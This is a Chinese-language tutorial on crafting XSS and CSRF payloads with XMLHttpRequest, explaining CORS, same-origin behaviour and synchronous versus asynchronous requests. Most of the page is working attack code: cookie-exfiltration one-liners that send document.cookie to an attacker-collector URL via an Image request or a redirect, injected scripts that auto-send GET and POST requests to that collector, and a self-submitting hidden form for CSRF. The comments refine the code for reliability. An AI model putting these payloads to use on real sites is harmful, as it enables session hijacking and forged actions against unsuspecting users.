ajax模拟请求
理解ajax
核心对象是XMLHttpRequest(简称xhr),IE7之前是通过ActiveXObject对象实现的。
- 异步:请求发出后脚本继续往下执行,不阻塞页面;响应到达后通过回调(如 onload / onreadystatechange)处理。注意 JS 本身仍是单线程,"异步"指不阻塞,并不是另起一个线程。
- 同步:请求发送后脚本停在原地等待响应,这段时间页面处于阻塞状态。主线程上的同步 XHR 已被浏览器废弃(会在控制台告警),下文的同步写法仅作演示。
xhr实例化
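// Obtain an XMLHttpRequest-compatible object.
// Modern browsers expose the native constructor; IE5/IE6 only offer the
// ActiveX "Microsoft.XMLHTTP" control.  The original spelled the global as
// `windows` and the control as `ActiveObject`, so the legacy branch threw a
// ReferenceError instead of creating anything.  Left as null when neither
// mechanism exists, so callers can test for it.
var xmlhttp;
if (typeof XMLHttpRequest !== "undefined") {
  xmlhttp = new XMLHttpRequest();
} else if (typeof ActiveXObject !== "undefined") {
  // IE5 / IE6
  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} else {
  xmlhttp = null;
}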
GET请求
ajax 遵守同源策略;W3C 的 CORS (Cross-Origin Resource Sharing) 方案支持跨域。在接收数据的一方(xss平台)的响应头中设置:
<?php header("Access-Control-Allow-Origin: *")?>
其中 * 表示允许任意来源,也可以写成指定的某个域。注意 * 不能与携带凭据(withCredentials / Cookie)的请求搭配使用,那种情况必须回显具体的 Origin 并加上 Access-Control-Allow-Credentials: true。
当漏洞点向 xss 平台发请求时,浏览器会自动加上 Origin 头;响应回来后由浏览器(而不是平台)比对 Access-Control-Allow-Origin 是否允许该来源,不允许就在控制台报跨域错误。但对于"简单请求"(GET,或 Content-Type 为表单类型且没有自定义头的 POST,本文的例子都属于这一类)浏览器不做预检,请求本身已经发出,所以虽然报错,平台仍然收到了数据,只是脚本读不到响应。带自定义头或 JSON Content-Type 的请求会先发 OPTIONS 预检,预检不通过则正式请求不会发出。
GET请求
<script>
// Create and open a cross-origin request; returns the request object, or
// null when the browser cannot do cross-origin XHR at all.
//   method - HTTP verb, passed straight to open()
//   url    - absolute URL of the receiving endpoint
// The `withCredentials` property only exists on CORS-capable XHR objects,
// so its presence is the feature test.  Legacy IE is handled through
// XDomainRequest instead.  The third open() argument (true) makes the
// request asynchronous.
function getRequest(method, url) {
  var probe = new XMLHttpRequest();
  if ("withCredentials" in probe) {
    probe.open(method, url, true);
    return probe;
  }
  if (typeof XDomainRequest !== "undefined") {
    var legacy = new XDomainRequest();
    legacy.open(method, url);
    return legacy;
  }
  return null;
}
// Fire the GET at the receiving endpoint.  getRequest() yields null when the
// browser has no cross-origin XHR, in which case nothing is sent.
var request = getRequest("get", "http://a.com/ajax.php?get=testaaa");
if (request) {
  // Reading the reply is optional for an exfiltration request and only works
  // when the endpoint answers with a matching Access-Control-Allow-Origin.
  // To inspect it, attach a handler before send(), e.g.
  //   request.onload = function () { alert(request.responseText); };
  request.send();
}
</script>
简单化get请求
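// Two "fire and forget" GET exfiltration primitives.  Both put the victim's
// cookie into the query string.  encodeURIComponent replaces the deprecated
// escape(): escape() leaves '+', '/' and '@' unencoded and emits %uXXXX for
// non-Latin-1 characters, so a cookie containing '+' arrives server-side as a
// space and non-ASCII values do not urldecode.  Cookies flagged HttpOnly are
// not visible to document.cookie and will be missing either way.
// Image request: nothing visible happens on the page.
new Image().src = "http://a.com/ajax.php?get=" + encodeURIComponent(document.cookie);
// Navigating the page: the address bar changes, so it is easy to notice.
location.href = "http://a.com/ajax.php?get=" + encodeURIComponent(document.cookie);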
简单POST请求
<script>
//xhr object
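// XHR object shared by request() below: the native constructor where
// available, else the IE5/IE6 ActiveX control, else false.
// Declared with var instead of as an implicit global, and the original's
// `windows` typo (a ReferenceError on the ActiveX branch) is fixed.
var xhr = (function () {
  if (typeof XMLHttpRequest !== "undefined") {
    return new XMLHttpRequest();
  }
  if (typeof ActiveXObject !== "undefined") {
    try {
      return new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e) {
      // the control exists but cannot be instantiated; report "no XHR"
    }
  }
  return false;
})();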
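// Send a synchronous request on the shared `xhr` and return the response body.
//   method       - HTTP verb ("GET", "POST", ...)
//   src          - target URL
//   argv         - request body (null/undefined for GET)
//   content_type - Content-Type header value; only sent for POST
// The third open() argument is false, i.e. synchronous: the script blocks
// until the reply arrives.  Browsers deprecate synchronous XHR on the main
// thread, so keep this for demos only.  Declared with var rather than as an
// implicit global; header name uses its canonical casing.
var request = function (method, src, argv, content_type) {
  xhr.open(method, src, false);
  if (method === 'POST') {
    xhr.setRequestHeader('Content-Type', content_type);
  }
  xhr.send(argv);
  return xhr.responseText;
};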
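// Demo: POST a urlencoded body to the receiving endpoint through request().
// The leading '&' in the body produces an empty first pair, which typical
// form parsers ignore.  Declared with var rather than as an implicit global.
var attack_a = function () {
  var src = "http://a.com/ajax.php";
  var argv_0 = "&post=postok";
  request("POST", src, argv_0, "application/x-www-form-urlencoded");
};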
// Runs as soon as the script is evaluated, i.e. the moment the injected payload loads.
attack_a();
</script>
其中 application/x-www-form-urlencoded 是浏览器表单提交的默认编码格式;另一种常见于文件上传,是 multipart/form-data。这两种 Content-Type 的 POST 都属于 CORS 的"简单请求",不会触发预检。
POST模拟表单提交
<script>
//xhr object
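// XHR object shared by request() below: the native constructor where
// available, else the IE5/IE6 ActiveX control, else false.
// Declared with var instead of as an implicit global, and the original's
// `windows` typo (a ReferenceError on the ActiveX branch) is fixed.
var xhr = (function () {
  if (typeof XMLHttpRequest !== "undefined") {
    return new XMLHttpRequest();
  }
  if (typeof ActiveXObject !== "undefined") {
    try {
      return new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e) {
      // the control exists but cannot be instantiated; report "no XHR"
    }
  }
  return false;
})();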
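// Send a synchronous request on the shared `xhr` and return the response body.
//   method       - HTTP verb ("GET", "POST", ...)
//   src          - target URL
//   argv         - request body (null/undefined for GET)
//   content_type - Content-Type header value; only sent for POST
// The third open() argument is false, i.e. synchronous: the script blocks
// until the reply arrives.  Browsers deprecate synchronous XHR on the main
// thread, so keep this for demos only.  Declared with var rather than as an
// implicit global; header name uses its canonical casing.
var request = function (method, src, argv, content_type) {
  xhr.open(method, src, false);
  if (method === 'POST') {
    xhr.setRequestHeader('Content-Type', content_type);
  }
  xhr.send(argv);
  return xhr.responseText;
};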
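// Serialize [name, value] pairs as a multipart/form-data body.
//   boundary - the bare boundary string (the same one that goes into the
//              Content-Type header); inside the body every part is preceded
//              by "--" + boundary and the body ends with "--" + boundary + "--".
//   fields   - array of [name, value] string pairs
// The original hand-built body omitted the closing delimiter, which strict
// multipart parsers reject as a truncated body.  Names and values are
// inserted verbatim (no quoting or escaping), so only pass constants you
// control.
function multipartBody(boundary, fields) {
  var delimiter = "--" + boundary;
  var body = "\r\n";
  for (var i = 0; i < fields.length; i++) {
    body += delimiter + "\r\nContent-Disposition:form-data;name=\"" + fields[i][0] + "\"\r\n\r\n";
    body += fields[i][1] + "\r\n";
  }
  return body + delimiter + "--\r\n";
}

// Demo: POST two form fields as multipart/form-data through request().
// Declared with var rather than as an implicit global.
var attack_a = function () {
  var src = "http://a.com/ajax.php";
  var boundary = "-------------------7964f8dddeb95fc5";
  var argv_0 = multipartBody(boundary, [["name1", "value1"], ["name2", "value2"]]);
  request("POST", src, argv_0, "multipart/form-data;boundary=" + boundary);
};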
// Runs as soon as the script is evaluated, i.e. the moment the injected payload loads.
attack_a();
</script>
动态创建表单提交(常用于csrf)
通过 javascript 动态创建一个 form 并自动提交。若目标站点校验 CSRF token、Origin/Referer,或会话 Cookie 带 SameSite 属性,这种方式会失效。
<html>
<body>
<script>
// Create an empty POST form, attach it to <body> and return it.
// document.body must already exist when this runs (see the notice at the
// end of the page about the "appendChild of null" error).
function new_form() {
  var form = document.createElement("form");
  form.method = "post";
  document.body.appendChild(form);
  return form;
}
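// Append a hidden text input named eName with value eValue to eForm and
// return it.  Browsers without document.all simply hide the input with
// display:none; on old IE (document.all present) it is kept displayed but
// shrunk to 0x0 instead.
// Fixes the original `e.style.width - '0px'`, a no-op subtraction that left
// the width untouched, by making it an assignment.
function create_elements(eForm, eName, eValue) {
  var input = document.createElement("input");
  eForm.appendChild(input);
  input.type = 'text';
  input.name = eName;
  if (!document.all) {
    input.style.display = 'none';
  } else {
    input.style.display = 'block';
    input.style.width = '0px';
    input.style.height = '0px';
  }
  input.value = eValue;
  return input;
}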
// Build the form, point it at the target, add the field(s) and submit it
// immediately.
var _f = new_form();
// target URL
_f.action = "http://a.com/ajax.php";
create_elements(_f, "post", "zzzz");
// add further fields the same way, e.g. create_elements(_f, "name2", "value2");
_f.submit();
</script>
</body>
</html>
notice:
本地测试的时候没有加上<html><body>xxx</body></html>
,然后报错Uncaught TypeError: Cannot read property 'appendChild' of null
参考了二哥的回复:点击我打开
原因是执行 document.body.appendChild(f) 时 document.body 还不存在:不带 <body> 的 <script> 会被解析器放进 <head> 并立即执行,此时 body 为 null,于是报错。把脚本放在 <body> 内部,或者在 DOMContentLoaded / window.onload 之后再执行即可。
know it then do it